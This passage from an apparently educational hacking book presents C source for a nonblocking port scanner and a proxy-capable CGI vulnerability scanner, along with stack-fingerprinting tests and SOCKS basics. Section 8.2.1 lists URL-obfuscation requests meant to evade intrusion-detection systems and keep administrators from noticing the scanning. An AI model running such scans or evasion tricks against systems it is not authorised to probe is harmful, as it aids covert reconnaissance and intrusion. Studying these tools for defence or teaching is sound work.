The multithreaded port scanner considered in the previous section does not work much faster than a regular single-threaded port scanner. The bottleneck is the connect() function in the critical section: the mutex keeps all other threads from calling it until the current call completes. In effect, the connect() function blocks the whole program, so multithreading brings no substantial performance gain. Dropping the mutex would let threads call connect() concurrently and establish multiple simultaneous connections; in that case, however, it is difficult to make the scanner work correctly. I have seen multithreaded scanners that allow multiple threads to call connect() simultaneously, but they are so inefficiently implemented that some of them work even slower than a regular single-threaded scanner. Multithreaded utilities have another shortcoming: they put a heavy load on the system.

Therefore, another approach to improving performance is used: creating multiple nonblocking sockets within one process and simply monitoring their state. Such programs are called socket engines.

A socket is placed into nonblocking mode by calling the fcntl() function as follows:

flags = fcntl(sd, F_GETFL, 0);

if (fcntl(sd, F_SETFL, flags | O_NONBLOCK) == -1) {
    perror("fcntl() -- could not set nonblocking");
    exit(-1);
}
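The same two fcntl() calls can be wrapped in a small helper. This is a sketch with hypothetical names (set_nonblocking() and is_nonblocking() are not from Listing 7.5); unlike the fragment above, it also checks the result of F_GETFL and returns an error code instead of exiting, leaving that decision to the caller.

```c
#include <fcntl.h>
#include <sys/socket.h>   /* socket(), used in the usage example */
#include <unistd.h>       /* close(), used in the usage example */

/* Switches descriptor fd to nonblocking mode, keeping its other flags.
   Returns 0 on success, -1 on error (errno is set by fcntl()). */
int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);
    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFL, flags | O_NONBLOCK) == -1 ? -1 : 0;
}

/* Returns 1 if O_NONBLOCK is set on fd, 0 if it is not, -1 on error. */
int is_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);
    if (flags == -1)
        return -1;
    return (flags & O_NONBLOCK) ? 1 : 0;
}
```

A freshly created TCP socket is in blocking mode, so is_nonblocking() reports 0 for it until set_nonblocking() has been called.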

When the connect() function is called for a nonblocking TCP socket, the connection-establishing process is initiated (the first packet of the three-way TCP handshake is sent), and connect() immediately returns -1 with errno set to EINPROGRESS. The port scanner must watch for this error, which means that connection establishment has started and is in progress. In rare instances, for example, when the server is on the same host as the client, a connection can be established right away; therefore, even for nonblocking sockets you have to check whether connect() returned success.

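The socket state is monitored using the select() function and the FD_ZERO, FD_SET, and FD_ISSET macros. When a socket becomes ready for reading or writing, the connection attempt has completed. Whether it succeeded is then checked with the getsockopt() function and the SO_ERROR option: if no error is reported, the connection with the remote port has been established; that is, the port is in the listening mode.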
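For a single socket, the whole sequence described above (nonblocking connect(), EINPROGRESS, select(), then SO_ERROR) fits in one function. The following is a minimal sketch; probe_port_nb() is a hypothetical name, it accepts only a dotted IPv4 address, and it waits on the write set only. Listing 7.5 applies the same steps to up to MAX_SOCK sockets at once.

```c
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <unistd.h>

/* Probes one TCP port with a nonblocking connect().
   Returns 1 if the connection succeeded (port listening), 0 if it was
   refused or did not complete within timeout_sec, -1 on local errors. */
int probe_port_nb(const char *ip, unsigned short port, int timeout_sec)
{
    struct sockaddr_in sa;
    struct timeval tv;
    fd_set wfds;
    int sd, flags, rc, result = -1;
    int error = 0;
    socklen_t len = sizeof(error);

    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1)
        return -1;

    if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        return -1;
    flags = fcntl(sd, F_GETFL, 0);
    if (flags == -1 || fcntl(sd, F_SETFL, flags | O_NONBLOCK) == -1)
        goto out;

    rc = connect(sd, (struct sockaddr *)&sa, sizeof(sa));
    if (rc == 0) {                  /* connected at once (e.g. local host) */
        result = 1;
        goto out;
    }
    if (errno != EINPROGRESS) {     /* e.g. ECONNREFUSED right away */
        result = 0;
        goto out;
    }

    FD_ZERO(&wfds);
    FD_SET(sd, &wfds);
    tv.tv_sec = timeout_sec;
    tv.tv_usec = 0;
    rc = select(sd + 1, NULL, &wfds, NULL, &tv);
    if (rc < 0)
        goto out;                   /* select() itself failed */
    if (rc == 0) {                  /* timed out: no answer */
        result = 0;
        goto out;
    }

    /* Writable means the attempt has finished; SO_ERROR tells how */
    if (getsockopt(sd, SOL_SOCKET, SO_ERROR, &error, &len) < 0)
        goto out;
    result = (error == 0) ? 1 : 0;
out:
    close(sd);
    return result;
}
```

For example, probe_port_nb("127.0.0.1", 22, 3) returns 1 if something on the local machine listens on port 22. A filtered port and a closed port both yield 0 here; telling them apart would require looking at which error SO_ERROR reports.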

Listing 7.5 shows the source code for a port scanner based on nonblocking sockets. The scanner tracks three socket states:

- state = 0: No socket created
- state = 1: A nonblocking socket created
- state = 2: A connection attempt is in progress


In addition to the address of the remote host and the port range, the command line specifies the time, in seconds, to wait for a socket to become ready; a connection attempt that does not complete within this time is abandoned.

The remaining aspects of the scanner's operation should be clear from the comments in the code.


The source code is compiled as usual: 


# gcc scan-nonblock.c -o scan-nonblock 


Listing 7.5. A port scanner on nonblocking sockets (scan-nonblock.c)





#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <time.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>

// The maximum number of sockets scanned in one pass
#define MAX_SOCK 50

/* ------------------------------------------------------------ */
/* Outputting information about the service using the open port */
/* ------------------------------------------------------------ */
void open_port(int port)
{
    struct servent *srvport;

    srvport = getservbyport(htons(port), "tcp");
    if (srvport == NULL)
        printf("Open: %d (unknown)\n", port);
    else
        printf("Open: %d (%s)\n", port, srvport->s_name);
    fflush(stdout);
}

/* ------------------------------------------------------------ */
/* The main() function                                          */
/* ------------------------------------------------------------ */
int main(int argc, char *argv[])
{
    /* A structure to monitor the socket states */
    struct usock_descr {
        int sd;                     // Socket
        int state;                  // Socket's current state
        time_t timestamp;           // Connection attempt start, in seconds
        unsigned short remoteport;  // Remote port
    };

    struct usock_descr sockets[MAX_SOCK];
    struct hostent* hp;
    struct sockaddr_in servaddr;
    struct timeval tv;
    fd_set rfds, wfds;
    int i, flags, max_fd;
    int port, PORT_LOW, PORT_HIGH;
    int MAXTIME;

    if (argc != 5) {
        fprintf(stderr, "Usage: %s <address> <portlow> <porthigh> <timeout in sec>\n",
                argv[0]);
        exit(-1);
    }

    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }
    PORT_LOW = atoi(argv[2]);        // Starting port
    PORT_HIGH = atoi(argv[3]) + 1;   // End port (+1 so that it is scanned too)
    MAXTIME = atoi(argv[4]);         // Time in seconds to wait for the
                                     // socket to become ready
    fprintf(stderr, "Running scan...\n");

    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr = *((struct in_addr *)hp->h_addr);

    /* Setting all sockets to state 0 */
    port = PORT_LOW;
    for (i = 0; i < MAX_SOCK; i++)
        sockets[i].state = 0;

    /* Main loop runs until all ports are scanned and
       no connection attempts are pending. */
    while (1) {
        /* Creating a socket, setting it to nonblocking mode,
           and setting its state to 1 (a nonblocking socket is created) */
        for (i = 0; (i < MAX_SOCK) && (port < PORT_HIGH); i++) {
            if (sockets[i].state == 0) {
                if ((sockets[i].sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
                    perror("socket() failed");
                    exit(-1);
                }
                flags = fcntl(sockets[i].sd, F_GETFL, 0);
                if (fcntl(sockets[i].sd, F_SETFL, flags | O_NONBLOCK) == -1) {
                    perror("fcntl() -- could not set nonblocking");
                    exit(-1);
                }
                sockets[i].state = 1;
            }
        }

        for (i = 0; (i < MAX_SOCK) && (port < PORT_HIGH); i++) {
            /* Checking for state 1 sockets and attempting
               to connect with the remote port */
            if (sockets[i].state == 1) {
                servaddr.sin_port = htons(port);
                if (connect(sockets[i].sd, (struct sockaddr *)&servaddr,
                            sizeof(servaddr)) == -1) {
                    if (errno != EINPROGRESS) {
                        /* The connect() call ended in an error other than
                           EINPROGRESS; therefore, close the socket
                           and set the state to 0. */
                        shutdown(sockets[i].sd, SHUT_RDWR);
                        close(sockets[i].sd);
                        sockets[i].state = 0;
                    } else
                        /* The connect() call returned the EINPROGRESS error;
                           therefore, set the socket's state to 2 to
                           wait for connection establishment. */
                        sockets[i].state = 2;
                } else {
                    /* The connection was established right away; i.e.,
                       the port is open: output its information to the screen. */
                    open_port(port);
                    /* The socket can be closed and its state set to 0. */
                    shutdown(sockets[i].sd, SHUT_RDWR);
                    close(sockets[i].sd);
                    sockets[i].state = 0;
                }
                /* Remembering the time the connection request was made
                   and the remote port being probed */
                sockets[i].timestamp = time(NULL);
                sockets[i].remoteport = port;

                port++;   // Taking the next port to scan
            }
        }

        /* Zeroing out descriptor sets */
        FD_ZERO(&rfds);
        FD_ZERO(&wfds);
        max_fd = -1;

        for (i = 0; i < MAX_SOCK; i++) {
            /* If a connection attempt is in progress, place the socket
               into the corresponding sets for the ensuing check. */
            if (sockets[i].state == 2) {
                FD_SET(sockets[i].sd, &wfds);
                FD_SET(sockets[i].sd, &rfds);
                if (sockets[i].sd > max_fd)
                    max_fd = sockets[i].sd;
            }
        }

        /* All ports have been tried and nothing is pending: done */
        if (max_fd == -1 && port >= PORT_HIGH)
            break;

        /* Checking the sockets' state without waiting */
        tv.tv_sec = 0;
        tv.tv_usec = 0;
        if (select(max_fd + 1, &rfds, &wfds, NULL, &tv) < 0) {
            perror("select() failed");
            exit(-1);
        }

        for (i = 0; i < MAX_SOCK; i++) {
            if (sockets[i].state == 2) {
                /* Checking if the given socket is in the descriptor set
                   and ready for read or write operations */
                if (FD_ISSET(sockets[i].sd, &wfds) || FD_ISSET(sockets[i].sd, &rfds)) {
                    int error;
                    socklen_t err_len = sizeof(error);

                    /* Checking for a connection error */
                    if (getsockopt(sockets[i].sd, SOL_SOCKET, SO_ERROR, &error,
                                   &err_len) < 0 || error != 0) {
                        /* If a connection error, close the socket
                           and set its state to 0. */
                        shutdown(sockets[i].sd, SHUT_RDWR);
                        close(sockets[i].sd);
                        sockets[i].state = 0;
                    } else {
                        /* If no error, the connection was established
                           successfully, i.e., the port is open: output
                           its information to the screen. */
                        open_port(sockets[i].remoteport);
                        /* The socket can be closed and its state set to 0. */
                        shutdown(sockets[i].sd, SHUT_RDWR);
                        close(sockets[i].sd);
                        sockets[i].state = 0;
                    }
                } else {
                    /* If the socket is not ready for read or write operations,
                       check how long it has been in this state; if the timeout
                       in seconds specified in the command line has expired,
                       close the socket and set its state to 0. */
                    if ((time(NULL) - sockets[i].timestamp) > MAXTIME) {
                        shutdown(sockets[i].sd, SHUT_RDWR);
                        close(sockets[i].sd);
                        sockets[i].state = 0;
                    }
                }
            }
        }
    }

    return 0;
}





7.6. Fingerprinting the TCP/IP Stack 


Some of the more advanced port scanners use the stack fingerprinting technique to determine the type and version of the remote host's operating system. The technique is based on the fact that different developers implement the TCP/IP stack in different ways; in particular, they interpret RFC recommendations differently. Consequently, two operating systems may react differently to the same request. The most complete description of the stack fingerprinting process is given in the "Remote OS Detection via TCP/IP Stack Fingerprinting" article by Fyodor in issue 54, article 9, of Phrack magazine (also available at http://insecure.org/nmap/nmap-fingerprinting-article.txt). The following is a partial list of tests that can be run against the stack to determine the type and version of the host's operating system:


- Sending a SYN packet with different combinations of flags set (for example, SYN|FIN|URG|PSH) and with different sets of parameters to an open port.
- Sending similar packets to a closed port.
- Sending a NULL packet (a packet with no flags set) with different sets of parameters to an open port.
- Sending a FIN packet to an open port. According to RFC 793, the probed system should not reply to this packet, but some stack implementations (for example, in Windows NT) do reply, sending FIN/ACK.
- Checking the initial TCP window size, which has a characteristic value in certain TCP/IP stack implementations.
- Checking the DF (don't fragment) bit in IP headers. Some operating systems set this bit in an attempt to improve performance.
- Checking the ACK value. Different TCP/IP stack implementations set the acknowledgment number differently: in some cases, the sent sequence number is returned; in others, the sent sequence number increased by 1.
- Sending a UDP packet to a closed port. Some operating systems follow the RFC 1812 recommendations and limit the rate at which error messages are sent. Thus, the operating system can be determined by counting the number of error messages that arrive within a certain period.
- Determining the length of ICMP messages. The length of ICMP error messages differs from one system to another; thus, an educated guess about the operating system type can be made by analyzing a received ICMP error message.
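Two of the checks above, the DF bit and the initial window size, amount to reading fixed header fields from a reply. The sketch below shows only that parsing step, under the assumption that the caller has already captured a complete IPv4 packet carrying a TCP segment (for example, from a raw socket); tcp_fp_features() is a hypothetical name, and sending probes and matching results against known systems are not shown.

```c
#include <stddef.h>
#include <stdint.h>

/* Extracts two fingerprinting features from a raw IPv4 packet that
   carries a TCP segment: the DF bit and the TCP window size.
   Returns 0 on success, -1 if the buffer is too short or not IPv4/TCP. */
int tcp_fp_features(const unsigned char *pkt, size_t len,
                    int *df_set, unsigned int *window)
{
    size_t ihl;
    uint16_t frag;

    if (len < 20 || (pkt[0] >> 4) != 4)            /* version must be 4 */
        return -1;
    ihl = (size_t)(pkt[0] & 0x0F) * 4;             /* IP header length */
    if (ihl < 20 || pkt[9] != 6 || len < ihl + 20) /* protocol 6 = TCP */
        return -1;

    /* Bytes 6-7: flags and fragment offset; DF is the 0x4000 bit */
    frag = (uint16_t)((pkt[6] << 8) | pkt[7]);
    *df_set = (frag & 0x4000) ? 1 : 0;

    /* TCP window: bytes 14-15 of the TCP header, network byte order */
    *window = (unsigned int)((pkt[ihl + 14] << 8) | pkt[ihl + 15]);
    return 0;
}
```

The values used in any test of this function are arbitrary; which window sizes or DF settings correspond to which operating systems has to come from a fingerprint database such as the one nmap uses.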




You can also think of and implement other tests. The nmap scanner runs a series of such 
tests to determine the operating system when executed with the -O command-line option. 
I don’t offer the source code for implementing stack fingerprinting, because by now you 
should have enough knowledge and skill to handle this task with ease. 





Chapter 8: CGI Scanner 





Nowadays, security professionals no longer use the term common gateway interface (CGI) scanner, preferring instead such terms as security scanner or vulnerability scanner. The term CGI scanner was most relevant from the security standpoint when errors in CGI applications were widespread. CGI applications are becoming a thing of the past, being replaced by modern Web languages such as PHP; therefore, CGI application errors are no longer of such great importance. I use the historical name, CGI scanner, on purpose, because I intend to show you how to develop a simple application analogous to the first CGI scanners. It would be a mistake to think that a CGI scanner can only detect vulnerable CGI applications; it can find other vulnerable files and scripts on a remote Web server that have nothing to do with CGI, including those written in PHP.

Modern security scanners are complete systems that perform all-encompassing checks for known and unknown vulnerabilities and offer the capabilities of port scanners, password guessers, and the other hacker utilities considered in this book. Some security scanners cost tens of thousands of dollars.

The first scanner to become widely known was Whisker, created by the hacker nicknamed Rain Forest Puppy. His site (http://www.wiretrip.net/rfp) says that Whisker no longer exists and recommends another scanner based on Whisker: Nikto, written by Chris Sullo. Like Whisker, Nikto is written in Perl. As they developed, both utilities acquired additional features, which are described in their usage instructions.
8.1. CGI Scanner Operating Principles and Implementation


The operating principle of the CGI scanner is simple. A mandatory component of a CGI scanner is a database of known vulnerable files and scripts, compiled from Bugtraq messages. The following is an example of some data from such a database:

/cgi-bin/account.cgi
/?PageServices
/cgi-bin/test-cgi
/cgi-bin/webgais
/scripts/tools/newdsn.exe
/ wtl prt/?.4
/catalog_type.asp
/cgi-bin/formmail.pl

The scanner sequentially requests all items in its database from a Web server. If a requested vulnerable file or script is present on the server, the server reports that the request succeeded, and the scanner outputs a message that a vulnerable script or file was detected. In this way, the scanner goes through the entire database and through the specified address range (if the latter capability is provided).

What should be done with the discovered vulnerabilities is up to the hackers. Usually, they 
search the Internet for the description of the vulnerability and use this information to break 
into the server. 

Listing 8.1, found later in this section, shows the source code for a simple console CGI scanner. This CGI scanner supports operation through an HTTP proxy server for anonymous scanning. The following arguments must be passed to the scanner on the command line:

<name or IP address of the Web host probed>[:port] [proxy server's name or IP address][:port]

The only mandatory parameter is the name or IP address of the Web host being probed. Optional port numbers are specified after a colon. The token() function parses the argument that names the host to connect to (the proxy server, if one is given) and separates the host name or IP address from the port number. If no port is specified, port 80 is used by default.
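The token() function in Listing 8.1 relies on strtok(), which writes into the argument string and stores its results in global variables. A sketch of an alternative that leaves its input untouched and also rejects a malformed port is shown below; split_host_port() is a hypothetical name, and the scanner itself does not use it.

```c
#include <stdlib.h>
#include <string.h>

/* Splits "host[:port]" into host and port without modifying arg.
   The port defaults to 80. Returns 0 on success, -1 if the host is empty
   or does not fit into host_size bytes, or the port is not 1..65535. */
int split_host_port(const char *arg, char *host, size_t host_size, int *port)
{
    const char *colon = strchr(arg, ':');
    size_t hlen = colon ? (size_t)(colon - arg) : strlen(arg);
    char *end;
    long p = 80;                        /* default HTTP port */

    if (hlen == 0 || hlen >= host_size)
        return -1;
    memcpy(host, arg, hlen);
    host[hlen] = '\0';

    if (colon) {
        p = strtol(colon + 1, &end, 10);
        if (end == colon + 1 || *end != '\0' || p < 1 || p > 65535)
            return -1;
    }
    *port = (int)p;
    return 0;
}
```

With this helper, "www.example.com:8080" yields the host www.example.com and port 8080, while "10.0.0.1" yields port 80.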

The database of vulnerable files and scripts is stored in a text file named cgi-bugs.dat. The database is small because I assembled it only for testing the scanner; therefore, it cannot be used for a serious exploration of Web servers for vulnerabilities.

The CGI scanner opens this file and reads its entries one by one using the standard fgets() function in a loop. At each loop iteration, a connection with the remote host is established using the connect() function. The remote host is the Web server being probed or, if one was specified in the command line, the proxy server.

The scanner operation is based on the application-layer protocol HTTP/1.1; therefore, in accordance with RFC 2068 and the more recent RFC 2616, which describe this protocol, the scanner forms the following request:

GET /the_path_to_a_script_from_the_database HTTP/1.1\r\n
Host:<host's name or IP address>\r\n\r\n
If the connection is established using an HTTP proxy server, the request looks a bit different:

GET http://host_address/the_path_to_a_script_from_the_database HTTP/1.1\r\n
Host:<host's name or IP address>\r\n\r\n

That is, in the latter case, a complete uniform resource locator (URL) is specified. The following are examples of requests to an actual server.

This is a regular request: 

GET /chat/xakep/login.aspx HTTP/1.1\r\n
Host:www.xakep.ru\r\n\r\n

And this is the same request made using a proxy server:

GET http://www.xakep.ru/chat/xakep/login.aspx HTTP/1.1\r\n
Host:www.xakep.ru\r\n\r\n
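Both request forms differ only in the request line, so one function can produce either. The following sketch uses a hypothetical name, build_request(), and snprintf() so that an overlong database entry cannot overflow the output buffer; the Host field is written without a space after the colon, exactly as in the examples above.

```c
#include <stdio.h>
#include <string.h>

/* Builds the request sent for one database entry.
   host: value of the Host field (and of the URL when a proxy is used);
   path: database entry such as "/cgi-bin/test-cgi";
   via_proxy: nonzero to put the complete URL into the request line.
   Returns the request length, or -1 if it does not fit into out. */
int build_request(char *out, size_t size, const char *host,
                  const char *path, int via_proxy)
{
    int n;

    if (via_proxy)
        n = snprintf(out, size, "GET http://%s%s HTTP/1.1\r\nHost:%s\r\n\r\n",
                     host, path, host);
    else
        n = snprintf(out, size, "GET %s HTTP/1.1\r\nHost:%s\r\n\r\n",
                     path, host);
    return (n < 0 || (size_t)n >= size) ? -1 : n;
}
```

Called with host "www.xakep.ru" and path "/chat/xakep/login.aspx", it produces the two requests shown above, depending on via_proxy.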

The GET method is used to retrieve any data stored or generated by a resource. The scanner examines the reply for the code 200 OK, which means that the requested item is present on the server. If the reply contains this code, the scanner outputs FOUND!!!; otherwise, Not Found is displayed. Successful hits are few and far between; the most common answers are 404 Not Found and 403 Forbidden. All possible codes that a Web server can return are described in RFC 2068; however, they are of no interest for the purposes of this CGI scanner.
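Listing 8.1 searches the received data for the string "200 OK" anywhere in the first 250 bytes, which can also match text in the page body. A stricter check reads the numeric code from the status line only. The sketch below is an assumption-based alternative, not what the listing does; http_status() is a hypothetical name.

```c
#include <stdio.h>

/* Returns the numeric status code from the start of an HTTP response
   ("HTTP/1.1 404 Not Found" -> 404), or -1 if there is no status line. */
int http_status(const char *resp)
{
    int major, minor, code;

    if (sscanf(resp, "HTTP/%d.%d %3d", &major, &minor, &code) != 3)
        return -1;
    return code;
}
```

In the scanner loop, the test would then become if (http_status(buf) == 200) instead of the strstr() call.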

After the scanner receives the reply, it closes the connection using the close() function and then either starts a new loop iteration to check another item or terminates execution if the end of the cgi-bugs.dat file is reached.

Instead of the GET method, the HEAD method can be used; it is analogous to the GET method, the only difference being that the server's reply to this request has no body. The GET method, however, is more reliable, because quite a few Web servers have support for the HEAD method disabled. Some of the better CGI scanners let you select which of these methods to use. You can also implement this feature in your custom scanner.

The following is an example of starting the CGI scanner and the results of its execution 
(the connection is established through a proxy server): 

# gcc cgi-scanner.c -o cgi-scanner 

# ./cgi-scanner www.xakep.ru:80 84.235.100.2:8080


=====================================
= Simple command line CGI scanner =
= by Ivan Sklyaroff, 2006 =
=====================================
 Start scanning "www.xakep.ru:80"...
=====================================
GET http://www.xakep.ru:80/cgi-bin/account.cgi HTTP/1.1
Host:www.xakep.ru:80

HTTP/1.1 404 Not Found
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 02 Jul 2006 00:27:42 GMT

<html><head><title>Error</title></he

Result: Not Found.

=====================================
GET http://www.xakep.ru:80/?PageServices HTTP/1.1
Host:www.xakep.ru:80

HTTP/1.1 200 OK
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Date: Sun, 02 Jul 2006 00:27:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Last-Modified: 02.07.2006 3:27:44
Content-Type: text/html; charset=windows-1251
Content-L

Result: FOUND!!!

=====================================
GET http://www.xakep.ru:80/cgi-bin/test-cgi HTTP/1.1
Host:www.xakep.ru:80

HTTP/1.1 404 Not Found
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 02 Jul 2006 00:27:58 GMT

<html><head><title>Error</title></he

Result: Not Found.





The scanner outputs up to 250 bytes of the received data after each request. To display only the results, delete or comment out the following line of code: printf("%s\n", buf);

As a way of protecting against CGI scanners, administrators sometimes replace the 404 error page with a custom page. In this case, the scanner will produce the FOUND!!! result for each nonexistent file or script, because the server will always return code 200 for such items. Administrators can also place fake files and scripts on the server that bear the names of known vulnerable items but are not actually vulnerable.

Therefore, outputting the body of the answer, or at least a part of it, can be useful for analyzing whether a positive result was produced by a real vulnerable script or by a fake one.
The source code for the CGI scanner and the vulnerable script database file cgi-bugs.dat
can be found in the /PART II/Chapter 8 folder on the accompanying CD-ROM.





Listing 8.1. The source code for the CGI scanner (cgi-scanner.c) 





#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* close() */

char *port_host;
char *name;

/* Splits "host[:port]" into name and port_host (port 80 by default).
   Note: strtok() modifies the string passed in arg. */
void token(char *arg)
{
    name = strtok(arg, ":");
    port_host = strtok(NULL, "");

    if (port_host == NULL)
        port_host = "80";
}

int main(int argc, char* argv[])
{
    FILE *fd;
    int sd;
    int bytes;
    char buf[250];
    char str1[270];
    char str2[100];
    struct hostent* host;
    struct sockaddr_in servaddr;

    if (argc < 2 || argc > 3) {
        printf("Usage: %s host[:port] [proxy][:port]\n\n", argv[0]);
        exit(-1);
    }
    fprintf(stderr, "=====================================\n");
    fprintf(stderr, "= Simple command line CGI scanner =\n");
    fprintf(stderr, "= by Ivan Sklyaroff, 2006 =\n");
    fprintf(stderr, "=====================================\n");

    /* Connect to the proxy if one is given, otherwise to the host itself */
    if (argc == 3)
        token(argv[2]);
    else
        token(argv[1]);

    if ((host = gethostbyname(name)) == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(atoi(port_host));
    servaddr.sin_addr = *((struct in_addr *)host->h_addr);

    if ((fd = fopen("cgi-bugs.dat", "r")) == NULL) {
        perror("fopen() failed");
        exit(-1);
    }

    fprintf(stderr, " Start scanning \"%s\"...\n", argv[1]);

    while (fgets(buf, sizeof(buf), fd) != NULL) {
        /* Strip the line break and skip empty lines */
        buf[strcspn(buf, "\r\n\t")] = 0;
        if (strlen(buf) == 0) continue;

        if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
            perror("socket() failed");
            exit(-1);
        }

        if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1) {
            perror("connect() failed");
            exit(-1);
        }

        printf("=====================================\n");
        /* Direct request: path only; through a proxy: the complete URL */
        if (argc == 2)
            snprintf(str1, sizeof(str1), "GET %s HTTP/1.1\r\n", buf);
        else
            snprintf(str1, sizeof(str1), "GET http://%s%s HTTP/1.1\r\n", argv[1], buf);

        snprintf(str2, sizeof(str2), "Host:%s\r\n\r\n", argv[1]);
        send(sd, str1, strlen(str1), 0);
        printf("%s", str1);

        send(sd, str2, strlen(str2), 0);
        printf("%s", str2);

        bzero(buf, sizeof(buf));
        bytes = recv(sd, buf, sizeof(buf) - 1, 0);
        if (bytes < 0)
            bytes = 0;          /* treat a receive error as an empty reply */
        buf[bytes] = 0;

        printf("%s\n", buf);

        if (strstr(buf, "200 OK") != NULL)
            printf("\nResult: FOUND!!!\n\n");
        else
            printf("\nResult: Not Found.\n\n");

        printf("=====================================\n");

        close(sd);
    }

    fprintf(stderr, "=====================================\n");
    fprintf(stderr, " End scan \"%s\".\n", argv[1]);
    fprintf(stderr, "=====================================\n");

    fclose(fd);

    return 0;
}





8.2. Improving the Basic CGI Scanner 


The CGI scanner described in Section 8.1 is slow. One way of improving its lackluster per- 
formance is to add multithreading capability; another, an even better way, is to equip it with 
nonblocking socket support. Both of these enhancements were considered in Chapter 7. 

Nowadays, more and more Web servers use HTTP over SSL (HTTPS) to encrypt traffic. For your CGI scanner to be able to explore such servers, you have to add SSL support to its code. How to do this is considered in Chapter 10.

HTTP/1.1 is the Internet's mainstream protocol, but every so often you may run into a server that works only with the obsolete version 1.0. Requests to HTTP/1.0 servers are analogous to requests to HTTP/1.1 servers, except that the Host field is not used:

GET /the_path_to_a_script_from_the_database HTTP/1.0\r\n\r\n


HTTP/1.0 is described in RFC 1945.
It would also be a good idea to make your scanner work with a list of proxy servers and to be able to specify a range of addresses for scanning.


8.2.1. Circumventing the Intrusion-Detection Systems 


As important as detecting potential vulnerabilities in a server is preventing the server administrator from detecting your activities. To this end, the scanner can be equipped with simple means of circumventing intrusion-detection systems. The following are just a few suggestions of how this can be done:


- Replace / with /./ in scanner requests:
  GET /./path/script.cgi HTTP/1.1\r\n
  GET /./path/./script.cgi HTTP/1.1\r\n
  GET /././path/./././script.cgi HTTP/1.1\r\n
- Use several / characters in a row:
  GET //path/script.cgi HTTP/1.1\r\n
  GET //path//script.cgi HTTP/1.1\r\n
  GET ///path////script.cgi HTTP/1.1\r\n
- Add fake paths using the ../ string, which cancels the directory name specified before it:
  GET /path/fiction/../script.cgi HTTP/1.1\r\n
  GET /path/fiction/../fiction2/../script.cgi HTTP/1.1\r\n
  GET /fiction/../path/fiction2/../script.cgi HTTP/1.1\r\n
- Add fake parameters:
  GET /path/script.cgi?fiction=blah HTTP/1.1\r\n
  GET /path/script.cgi?fiction=blah&fiction2=blah2 HTTP/1.1\r\n
- Replace characters with their hexadecimal codes:
  GET /path/script%2Ecgi HTTP/1.1\r\n
  GET /path/%73%63%72%69%70%74%2E%63%67%69 HTTP/1.1\r\n
  GET /%70%61%74%68/%73%63%72%69%70%74%2E%63%67%69 HTTP/1.1\r\n


All of the preceding requests address the same script as this one:
GET /path/script.cgi HTTP/1.1\r\n


All of these ways of throwing the hounds off the scent can be used in a single request. 


8.2.2. Working with SOCKS Proxy Servers 


Another way to enhance your CGI scanner is to add support for SOCKS proxy servers (versions 4 and 5) to it. The fifth version of SOCKS is described in RFC 1928. Programming for both versions is similar. The major innovations in SOCKSv5 are user authentication support, UDP support, and resolution of host names to addresses by the proxy.

A connection using a SOCKS proxy is established in two stages. During the first stage,
the client sends a greeting and optional authentication is performed. During the second stage,
the client passes the server the address of the destination host.

The greeting is a message that a client sends after connecting to a SOCKS proxy server; 
it has the following format: 

1 byte: the version number
1 byte: the number (N) of methods
N bytes: a list of the methods supported by the client

The first byte is the number of the SOCKS version: 0x05 for version 5 and 0x04 for version
4. The next byte is the number of connection and authentication methods supported by
the client; it is followed by a sequence of bytes identifying these methods. A method byte of
0x00 means that the client supports connection without authentication; 0x02 means that the
client can supply a user name and a password if necessary. SOCKS user name/password
authentication is described in RFC 1929.
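To make the greeting layout concrete, here is a minimal sketch that writes these bytes into a buffer for an arbitrary list of methods. socks5_build_greeting() is a hypothetical helper, not a library function, and it assumes SOCKS version 5.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: builds a SOCKSv5 greeting (VER, NMETHODS, METHODS...)
   in buf. Returns the number of bytes written, or -1 if the arguments are
   invalid or buf is too small. */
int socks5_build_greeting(unsigned char *buf, size_t bufsize,
                          const unsigned char *methods, size_t nmethods)
{
    if (nmethods == 0 || nmethods > 255 || bufsize < 2 + nmethods)
        return -1;
    buf[0] = 0x05;                        /* SOCKS version 5 */
    buf[1] = (unsigned char) nmethods;    /* number of methods (N) */
    memcpy(buf + 2, methods, nmethods);   /* N method bytes */
    return (int) (2 + nmethods);
}
```

For example, offering methods 0x00 and 0x02 produces the 4 bytes 05 02 00 02, whereas the program in this section sends the fixed 3-byte greeting 05 01 00, which offers only the no-authentication method.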

A server must answer a SOCKS greeting from a client with 2 bytes: The first is its own version
number, and the second is the connection and authentication method selected from the list
sent by the client. If the proxy finds none of the methods offered by the client acceptable,
the second byte of the reply is 0xFF and further work with this server is not possible. The
value of 0x00 allows the client to proceed to the next stage without authentication.
